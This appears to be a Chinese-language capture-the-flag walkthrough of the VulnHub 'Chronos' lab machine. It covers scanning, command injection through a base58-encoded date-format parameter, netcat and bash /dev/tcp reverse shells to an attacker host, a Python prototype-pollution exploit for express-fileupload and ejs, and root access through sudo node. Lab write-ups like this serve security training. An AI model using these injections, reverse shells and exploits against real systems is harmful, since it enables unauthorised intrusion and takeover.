vulnhub_chronos

2024-01-11 14:05:16

命令注入getshell

主机发现

二层的arp扫描

arp-scan -l

发现目标靶机

192.168.56.106  08:00:27:f8:30:43       PCS Systemtechnik GmbH

方法二：

netdiscover -r 192.168.56.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor           
 192.168.56.100  08:00:27:42:a6:57      1      60  PCS Systemtechnik GmbH   
 192.168.56.106  08:00:27:f8:30:43      1      60  PCS Systemtechnik GmbH

端口扫描

nmap -p- 192.168.56.106    

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 12:23 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.000056s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8000/tcp open  http-alt
MAC Address: 08:00:27:F8:30:43 (Oracle VirtualBox virtual NIC)

继续扫描特定端口

nmap -p22,80,8000 -sV 192.168.56.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-11 12:27 CST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.106
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    Node.js Express framework
MAC Address: 08:00:27:F8:30:43 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds

8000端口node.js和Express框架

web侦查

访问80端口，看到一个闪着星星的页面

ctrl+u，查看源代码，审计js

var _0x5bdf = [
	'150447srWefj',
	'70lwLrol',
	'1658165LmcNig',
	'open',
	'1260881JUqdKM',
	'10737CrnEEe',
	'2SjTdWC',
	'readyState',
	'responseText',
	'1278676qXleJg',
	'797116soVTES',
	'onreadystatechange',
	'http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL',
	'User-Agent',
	'status',
	'1DYOODT',
	'400909Mbbcfr',
	'Chronos',
	'2QRBPWS',
	'getElementById',
	'innerHTML',
	'date'
];
(function (_0x506b95, _0x817e36) {
	var _0x244260 = _0x432d;
	while (!![]) {
		try {
			var _0x35824b = -parseInt(_0x244260(126)) * parseInt(_0x244260(144)) + parseInt(_0x244260(142)) + parseInt(_0x244260(127)) * parseInt(_0x244260(131)) + -parseInt(_0x244260(135)) + -parseInt(_0x244260(130)) * parseInt(_0x244260(141)) + -parseInt(_0x244260(136)) + parseInt(_0x244260(128)) * parseInt(_0x244260(132));
			if (_0x35824b === _0x817e36)
				break;
			else
				_0x506b95['push'](_0x506b95['shift']());
		} catch (_0x3fb1dc) {
			_0x506b95['push'](_0x506b95['shift']());
		}
	}
}(_0x5bdf, 831262));
function _0x432d(_0x16bd66, _0x33ffa9) {
	return _0x432d = function (_0x5bdf82, _0x432dc8) {
		_0x5bdf82 = _0x5bdf82 - 126;
		var _0x4da6e8 = _0x5bdf[_0x5bdf82];
		return _0x4da6e8;
	}, _0x432d(_0x16bd66, _0x33ffa9);
}
function loadDoc() {
	var _0x17df92 = _0x432d, _0x1cff55 = _0x17df92(143), _0x2beb35 = new XMLHttpRequest();
	_0x2beb35[_0x17df92(137)] = function () {
		var _0x146f5d = _0x17df92;
		this[_0x146f5d(133)] == 4 && this[_0x146f5d(140)] == 200 && (document[_0x146f5d(145)](_0x146f5d(147))[_0x146f5d(146)] = this[_0x146f5d(134)]);
	}, _0x2beb35[_0x17df92(129)]('GET', _0x17df92(138), !![]), _0x2beb35['setRequestHeader'](_0x17df92(139), _0x1cff55), _0x2beb35['send']();
}

很多函数名称变量名称都进行了编码，我们要用工具进行美化整理

https://gchq.github.io/CyberChef/

调用左侧的JavaScript beauty模块来处理

注意到这一个url：http://chronos.local:8000/date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

应该是个接口

注意这里需要要修改hosts文件

/etc/hosts

C:\Windows\System32\drivers\etc\hosts

192.168.56.106	chronos.local

这样他就能够成功调用这个接口，果然返回主页面发现多了一个显示时间的功能，通过数据包分析就是上面那个url请求返回的时间

编码分析

对于format参数后面的一串密文进行测试，发现密文改变不正确返回信息

这个时候用cybercheats的magic模块来解码，发现是base58编码

'+Today is %A, %B %d, %Y %H:%M:%S.'

这里这串格式就是linux的date命令中的格式化输出时间的格式

getshell

拼接命令执行

'+Today is %A, %B %d, %Y %H:%M:%S.'|ls

编码后传入，成功ls

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 51
ETag: W/"33-6DM2EIzY4tbMmRTZn59xGEQtqRo"
Date: Mon, 11 Oct 2021 06:17:58 GMT
Connection: close

app.js
node_modules
package.json
package-lock.json

尝试反弹shell，我用串联shell

通过ls /bin来查看目标系统上面的命令

| nc 192.168.56.103 3333 | /bin/bash | nc 192.168.56.103 4444

成功拿到shell

提权

提权三种思路：内核漏洞，suid权限配置不当，sudo权限配置不当

如果遇到思路瓶颈，就对目标系统进行大量的信息搜集，并且使用搜索引擎大量搜索

思路源于大量的，完善的信息搜集

靶机信息搜集

cat /etc/passwd
发现imera账号

在/home/imera目录下发现flag，但是权限不够

这个时候浏览了网站服务端的目录，终于在/opt/chronos-v2/backend下的package.json中找到突破点

{
  "name": "some-website",
  "version": "1.0.0",
  "description": "",
  "main": "server.js",
  "scripts": {
    "start": "node server.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "ejs": "^3.1.5",
    "express": "^4.17.1",
    "express-fileupload": "^1.1.7-alpha.3"
  }
}

漏洞文档

https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/?cf_chl_jschl_tk=pmd_mfs6h1bzfjM65lm8.h.YPsgFFV_TUv9.beIEcm0JoyE-1633937276-0-gqNtZGzNAlCjcnBszQi9

https://blog.p6.is/Real-World-JS-1/

提权到普通用户

修改文章最后的exp

import requests

cmd = 'bash -c "bash -i &> /dev/tcp/192.168.56.103/5555 0>&1"'

# pollute
requests.post('http://127.0.0.1:8080', files = {'__proto__.outputFunctionName': (
    None, f"x;console.log(1);process.mainModule.require('child_process').exec('{cmd}');x")})

# execute command
requests.get('http://127.0.0.1:8080')

wget下载到靶机执行，获得上面的imera用户的shell，至此也可以拿到第一个flag

imera@chronos:/opt/chronos-v2/backend$ cat /home/imera/user.txt
cat /home/imera/user.txt
byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK

提权到root

思路：sudo配置不当

imera@chronos:/opt/chronos-v2/backend$ sudo -l
sudo -l
Matching Defaults entries for imera on chronos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User imera may run the following commands on chronos:
    (ALL) NOPASSWD: /usr/local/bin/npm *
    (ALL) NOPASSWD: /usr/local/bin/node *

就是说不需要password就能运行npm和node命令

利用node子进程提权成功

sudo node -e 'child_process.spawn("/bin/bash",{stdio:[0,1,2]})'

拿到root的flag

cat /root/root.txt
YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK

总结

自己做的时候卡住的地方：

format=后面的编码，不会解码
拿普通用户shell的时候

信息搜集要全，思路要灵活

善用搜索引擎！

码农公寓